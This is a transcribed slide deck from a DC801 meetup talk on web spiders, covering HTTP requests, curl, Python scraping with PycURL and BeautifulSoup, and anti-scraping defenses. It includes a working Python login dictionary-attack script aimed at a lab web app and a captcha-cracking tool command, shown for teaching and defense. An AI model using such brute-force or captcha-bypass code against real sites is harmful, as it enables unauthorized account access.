Web Spiders. https://github.com/obscuritysystems/webspiders. DC Labs. Lance Buttars AKA

Similar documents
reference: HTTP: The Definitive Guide by David Gourley and Brian Totty (O Reilly, 2002)

Security-Assessment.com White Paper Leveraging XSRF with Apache Web Server Compatibility with older browser feature and Java Applet

Internet Technologies Internet Protocols and Services

Outline Definition of Webserver HTTP Static is no fun Software SSL. Webserver. in a nutshell. Sebastian Hollizeck. June, the 4 th 2013

HTTP Protocol. Bartosz Walter

Hypertext for Hyper Techs

The Hyper-Text Transfer Protocol (HTTP)

Table of Contents. Open-Xchange Authentication & Session Handling. 1.Introduction...3

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh

No. Time Source Destination Protocol Info HTTP GET /ethereal-labs/http-ethereal-file1.html HTTP/1.

THE PROXY SERVER 1 1 PURPOSE 3 2 USAGE EXAMPLES 4 3 STARTING THE PROXY SERVER 5 4 READING THE LOG 6

GET /FB/index.html HTTP/1.1 Host: lmi32.cnam.fr

Information Extraction Art of Testing Network Peripheral Devices

Protocolo HTTP. Web and HTTP. HTTP overview. HTTP overview

1. When will an IP process drop a datagram? 2. When will an IP process fragment a datagram? 3. When will a TCP process drop a segment?

HTTP Response Splitting

CS640: Introduction to Computer Networks. Applications FTP: The File Transfer Protocol

sessionx Desarrollo de Aplicaciones en Red Web Applications History (1) Content History (2) History (3)

Project #2. CSE 123b Communications Software. HTTP Messages. HTTP Basics. HTTP Request. HTTP Request. Spring Four parts

HTTP. Internet Engineering. Fall Bahador Bakhshi CE & IT Department, Amirkabir University of Technology

Architecture of So-ware Systems HTTP Protocol. Mar8n Rehák

Using SAML for Single Sign-On in the SOA Software Platform

Cyber Security Workshop Ethical Web Hacking

Acunetix Website Audit. 5 November, Developer Report. Generated by Acunetix WVS Reporter (v8.0 Build )

Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers

Developing Applications With The Web Server Gateway Interface. James Gardner EuroPython 3 rd July

CloudOYE CDN USER MANUAL

Vodia PBX RESTful API (v2.0)

Ethical Hacking as a Professional Penetration Testing Technique

Sticky Session Setup and Troubleshooting

Module 45 (More Web Hacking)

Web Security Threat Report: January April Ryan C. Barnett WASC Member Project Lead: Distributed Open Proxy Honeypots

ivoyeur: permission to parse

COMP 112 Assignment 1: HTTP Servers

Hack Yourself First. Troy troyhunt.com

T14 SECURITY TESTING: ARE YOU A DEER IN THE HEADLIGHTS? Ryan English SPI Dynamics Inc BIO PRESENTATION. Thursday, May 18, :30PM

Arnaud Becart ip- label 11/9/11

Playing with Web Application Firewalls

Network Technologies

DDoS Protecion Total AnnihilationD. DDoS Mitigation Lab

Combating Web Fraud with Predictive Analytics. Dave Moore Novetta Solutions

HTTP Caching & Cache-Busting for Content Publishers

Protocol-Level Evasion of Web Application Firewalls

Title page. Alcatel-Lucent 5620 SERVICE AWARE MANAGER 13.0 R7

Internet Technologies. World Wide Web (WWW) Proxy Server Network Address Translator (NAT)

JASPERREPORTS SERVER WEB SERVICES GUIDE

1945: 1989: ! Tim Berners-Lee (CERN) writes internal proposal to develop a. 1990:! Tim BL writes a graphical browser for Next machines.

Web Security: SSL/TLS

Web. Services. Web Technologies. Today. Web. Technologies. Internet WWW. Protocols TCP/IP HTTP. Apache. Next Time. Lecture # Apache.

Securing SharePoint Server with Windows Azure Multi- Factor Authentication

HTTP Authentifizierung

Configuring Single Sign-on for WebVPN

HTTP Authentication. RFC 2617 obsoletes RFC 2069

Demystifying cache. Kristian Lyngstøl Product Specialist Varnish Software AS

Lecture 11 Web Application Security (part 1)

Cache All The Things

SANS Institute 200 5, Author retains full rights.

CloudFlare vs Incapsula vs ModSecurity

Abusing the Internet of Things. BLACKOUTS. FREAKOUTS. AND

By Bardia, Patit, and Rozheh

URLs and HTTP. ICW Lecture 10 Tom Chothia

CIS 551 / TCOM 401 Computer and Network Security. Spring 2007 Lecture 20

CTIS 256 Web Technologies II. Week # 1 Serkan GENÇ

Deployment Guide. Caching (Static & Dynamic) Deployment Guide. A Step-by-Step Technical Guide

Headless Drupal. Buzzword or Next Big Thing? Drupal City Berlin

Research of Web Real-Time Communication Based on Web Socket

Security for mobile apps

International Journal of Engineering & Technology IJET-IJENS Vol:14 No:06 44

Playing with Web Application Firewalls

Chapter 27 Hypertext Transfer Protocol

CONTENT of this CHAPTER

Varnish Tips & Tricks, 2015 edition

World Wide Web. Before WWW

What is Web Security? Motivation

Web application security

Acrobat Connect. Using Connect Enterprise Web Services

The Web: some jargon. User agent for Web is called a browser: Web page: Most Web pages consist of: Server for Web is called Web server:

Príprava štúdia matematiky a informatiky na FMFI UK v anglickom jazyku

Bug Report. Date: March 19, 2011 Reporter: Chris Jarabek

Barracuda Networks Web Application Firewall

Chapter 2: Interactive Web Applications

The HTTP Plug-in. Table of contents

DEPLOYMENT GUIDE DEPLOYING THE BIG-IP LTM SYSTEM WITH CITRIX PRESENTATION SERVER 3.0 AND 4.5

HTTP Fingerprinting and Advanced Assessment Techniques

TCP/IP Networking An Example

Multifactor Authentication

DEPLOYMENT GUIDE Version 1.1. Deploying the BIG-IP LTM v10 with Citrix Presentation Server 4.5

Carbon Dating the Web

PHP code audits. OSCON 2009 San José, CA, USA July 21th 2009

People Data and the Web Forms and CGI CGI. Facilitating interactive web applications

Cross-Site Scripting (XSS) Attack Lab

Java Web Application Security

Alteon Browser-Smart Load Balancing

Application Security Testing. Generic Test Strategy

Hack Yourself First. Troy troyhunt.com

Cyber Security Challenge Australia 2014

Botnets. Sponsored by: ISSA Web Conference. October 26, 2010 Start Time: 9 am US Pacific, Noon US Eastern, 5 pm London

LBL Application Availability Infrastructure Unified Secure Reverse Proxy

ATS Test Documentation

Our My first DDoS attack. Velocity Europe 2011 Berlin Cosimo Streppone Operations Lead

Transcription:

Web Spiders https://github.com/obscuritysystems/webspiders DC801 801 Labs Lance Buttars AKA Nemus @Lost_Nemus nemus@grayhatlabs.com

HTTP (Hypertext Transfer Protocol) What is a website? To a crawler or spider a website is a file that is downloaded and analyzed. To users they are interactive programs, but to spider a website is nothing more than a set off http calls and web forms that become API's.

HTTP Methods "OPTIONS" Only returns HTTP options available. "GET" - Return a resource. "HEAD" - Exactly Like GET, but only turns HTTP headers. "POST" - Creates a new resource. "PUT" - Send Data to the Server. "DELETE" - Delete Data from the Server. "TRACE" - Return the request headers sent by client. "CONNECT" - used with proxies that can dynamically switch to being a ssl tunnel. More info http://www.w3.org/protocols/rfc2616/rfc2616-sec9.html#sec9.9

Http Get Request GET http://www.obscuritysystems.com HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;) Pragma: no-cache Cache-control: no-cache Content-Length: 0 Host: obscuritysystems.com

Http Get Response HTTP/1.1 200 OK Server: nginx/1.4.7 Date: Fri, 16 May 2014 03:22:29 GMT Content-Type: text/html Content-Length: 1475 Last-Modified: Fri, 16 Aug 2013 16:58:34 GMT Connection: keep-alive ETag: "520e5a3a-5c3" Accept-Ranges: byte

Tamper Data https://addons.mozilla.org/en-us/firefox/addon/tamper-data/

v

HTTP Post Request POST http://dc801party/index.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 DNT: 1 Referer: http://dc801party/ Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 186 Host: dc801party

HTTP Post Body Post looks like paramter = value & -sperator handle=nemus&firstname=lance&lastname=buttars Example Post from Form Above handle=nemus&firstname=lance&lastname=buttars&address1=12 +Fake+Stree&address2=&city=Somwhere+vile&state=AL&zipcode 123456&email=nemu %40grayhatlabs.com&phone=asdfasdf&month=sd&year=asdf

Http Post Response HTTP/1.1 200 OK Server: nginx/1.0.15 Date: Fri, 16 May 2014 05:49:32 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.5.12 Html data in the response

HTTP Response Codes 200 s are used for successes. 300 s are for redirection of the client. 400 s are used if there was a problem with the request or the client is not authorized. 500 s are used if there was an error on the http server. Complete List of HTTP Codes http://en.wikipedia.org/wiki/list_of_http_status_code

Is Web Crawling Ethical? It Depends? Can you scrape google? Does the site say you cannot scrap it? Is the content copyrighted? Talk to a lawyer for more details. (PS I am not one.) Regardless of legality it is being done. Always check for an API first

Response Codes of Note 200 OK 206 Partial Content 301 Moved Permanently 302 Moved Temporarily 401 Unauthorized 403 Forbidden 404 Not Found 500 Internal Server Error

HTTP Get GET /owaspbricks/content-2/index.php?user=harry HTTP/1.1 Host: 10.254.10.164 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://10.254.10.164/owaspbricks/content-pages.html Cookie: PHPSESSID=g2b4vc2336d9pcbh0255rclit5; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; JSESSIONID=891718788BC0E2F580A5394FBA979606 Connection: keep-alive

Result for Get Request

HTTP Post POST /peruggia/index.php?action=login&check=1 HTTP/1.1 Host: x.x.x.164 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://10.254.10.164/peruggia/index.php?action=login Cookie: PHPSESSID=g2b4vc2336d9pcbh0255rclit5; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; JSESSIONID=891718788BC0E2F580A5394FBA979606 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 27 username=test&password=test

HTTP Request Headers User-Agent Mozilla/5.0 (Windows; U; Windows NT 6.1; en- (Client information) Accept-Language - en-us,en;q=0.5 Accept-Encoding gzip,deflate Cookie PHPSESSID=et4dnatn161fv79rt437qhd056; Referer http://127.0.0.1/referer.php ( contains the referring url) Authorization Basic QXbab1VyOm14cGFzcw==

HTTP Response Headers Content-Type text/html; charset=utf-8 Content-Disposition: attachment; filename="test.zip" Location - used for redirection If the response code is 301 or 302. Set-Cookie When a website wants to update a cookie in your browser Content-Encoding: gzip

Curl CLI #Curl http post login data with POST request. curl --request POST 'http://www.test.com/login/' --data 'username=myusername&password=mypassword' # Curl send search add url parameters. curl --request GET 'http://www.youtube.com/results?search_query=my_keyword # Curl PUT request with data. curl --request PUT 'http://www.test.com/restful/api/resource/12345/' --data 'email=person@gmail.com' # Same but use data.txt for http body request parameters. curl --request PUT 'http://www.test.com/rest/api/user/12345/'\ --data @data.txt # Curl with http headers set. curl --request GET 'http://www.test.com/user/info/' \ --header 'sessionid:1234567890987654321'

HTTP Basic Authentication HTTP supports the use of many different authentication techniques to limit access to pages and other resources. The Most common is basic auth. The client sends the user name and password as unencrypted base64 encoded text. It should only be used with HTTPS, as the password can be easily captured and reused over HTTP.

PyCurl Setup import pycurl # used to execute curl in python import urllib # used to format parameters into a http url import StringIO # library used to store curl results from bs4 import BeautifulSoup # library for parsing html content c = pycurl.curl() # curl object url = 'http://10.254.10.164/owaspbricks/content-1/index.php?' attr = urllib.urlencode({'id': '1' }) url = url + attr # url we are calling # set id to 1 # Get request append urlencoded parameters to url c.setopt(c.url, url) # set url n curl object c.setopt(c.connecttimeout, 5) # set time call timeout to 5 secounds c.setopt(pycurl.followlocation, 1) # if we get a location header response follow it. c.setopt(c.timeout, 8) # maximum amount of seconds curl is allowed to run b = StringIO.StringIO() c.setopt(c.cookiefile, '') # String io object #the file to sotre the cookie data c.setopt(c.httpheader, ['Accept: application/html', 'Content-Type: application/x-www-formurlencoded']) # c.setopt(pycurl.writefunction, b.write)

Lets Use Beautiful Soup to Parse this HTML

Parsing Web Pages c.perform() html_doc = b.getvalue() soup = BeautifulSoup(html_doc) fieldset = soup.find_all('fieldset') for feild in fieldset: user_id = field.find_next('b').string user_name = feild.find_next('b').find_next('b').string user_email = feild.find_next('b').find_next('b').find_next('b').string person = {'user_id':user_id,'user_email':user_email,'user_name':user_n ame} people.append(person) except pycurl.error, error: errno, errstr = error print 'An error occurred: ', errstr

Http Login Dictionary Attack passwords = ['test','1234','4321','admin','badmin'] for password in passwords: c = pycurl.curl() # curl object url = 'http://10.24.10.164/peruggia/index.php?action=login&check=1' # url we are calling. params = urllib.urlencode({'username':'admin','password':password }) # set id to 1 c.setopt(c.postfields, params) c.setopt(c.url, url) c.setopt(c.connecttimeout, 5) c.setopt(pycurl.followlocation, 1) c.setopt(c.timeout, 8) c.setopt(c.cookiefile, '') #c.setopt(c.verbose, True) c.setopt(pycurl.cookiejar, 'cookie.txt') b = StringIO.StringIO() # # set url n curl object # set time call timeout to 5 secounds # if we get a location header response follow it. # maximum amount of seconds curl is allowed to run # the file to sotre the cookie data. # dislay http calls in terminal # cookie file to store website cookie data # String io object #c.setopt(c.proxy, 'http://127.0.0.1:8080') c.setopt(c.httpheader, ['Accept: application/html', 'Content-Type: application/x-www-form-urlencoded']) c.setopt(pycurl.writefunction, b.write) #debug calls in burpsuite

Http Dictionary Attack 2 try: c.perform() html_doc = b.getvalue() soup = BeautifulSoup(html_doc) # run pycurl # get html from StrinIO # parse html text = soup.get_text() # get website a pure test #print '------------------ ' + "\n" #print text #print '------------------ ' + "\n" if text.find('login') == -1: print "found password : " + password +"\n" else: print "password is not : " + password +"\n" except pycurl.error, error: errno, errstr = error print 'An error occurred: ', errstr

Cat / Mouse of screen scraping and preventing screen scraping. Defense Use Captcha's after so many failed login attempts. Black list IP addresses of multiple failed request. Assume malicious intent from ip address or request coming to those pages. Lock Out users after so many attempts. Obscure content with by using JavaScript obscuring? Counter user random proxies for requests (VPS and Proxy Services are cheap). Create honey links in robots.txt links that have nothing todo with your website. Counter OCR captures or pass captures to real users or take advantage of sound captures using voice to text parsers. Well it might stop most crawlers, but wont stop someone who is is persistent. Track request per ip address start using captcha after x number of similar requests. Use proactive measures like putting a website policy forbidding scraping, limiting results per request. Rendering and reactive measures like policing by monitoring Physical and Internet (through IP address) identities.

Captchas Good captchas can't be recognized by standard optical character recognition. Don't store answer in hidden form fields. Use of a captcha worth the hassle to legitimate users? Don't use html to render challenge. Don't use trivial questions such as addition or images. Spam is not the user s problem; it is the problem of the business that is providing the website. It is arrogant and lazy to try and push the problem onto a website s visitors. Tim Kadlec, Death To CAPTCHAs

Captcha Truder http://cintruder.sourceforge.net/ python cintruder --crackhttp://host.com/path/captcha.gif " " python cintruder list http://ptigas.com/blog/2011/02/18/simple-captcha-s lver-in-python/ http://www.boyter.org/decoding-captchas/#technolo gyused http://www.debasish.in/2012/01/bypass-captchausing-python-and.html

recaptcha recaptcha s creates some productivity out of captchas. One word can be deciphered using OCR. The second is a word, taken from a book, which OCR failed to decipher. Well both words where originally undecipherable by OCR, but one word the control case word, is a word that has been confirmed to be identified correctly. The second word is one that has not had a large enough base of consistent answers to correctly determine what word it is.

Multi-factor authentication Yubi key? RSA Keys? Swekey? One Time Passwords

Spam Filtering and HTTP defense Akismet is a hosted web service that automatically detecting comment and trackback spam for blogs. ModSecurity Web Application Firewall SBLAM- antispam filter for forms on http://www.modsecurity.org/ http://sblam.com/en.html Inspekt - Input validation library

Cool Tools Selenium - automates browser can get past javascript selenium (Zed Attack Proxy) Zap OWASP GUI and the ability to program webspiders from captured http requests using a web proxy. Burpsuite - Free to download yearly cost for full version. More professional than Zap contains many of the same features.

More information Scraping Webbots, Spiders, and Screen Scrapers, 2nd Edition by Michael Schrenk No Starch Press OWASP projecthttps://www.owasp.org/ Background from http://cartelthemes.com/3d-green-d-wallpaper-hd-34199hd-wallpapers-background.htm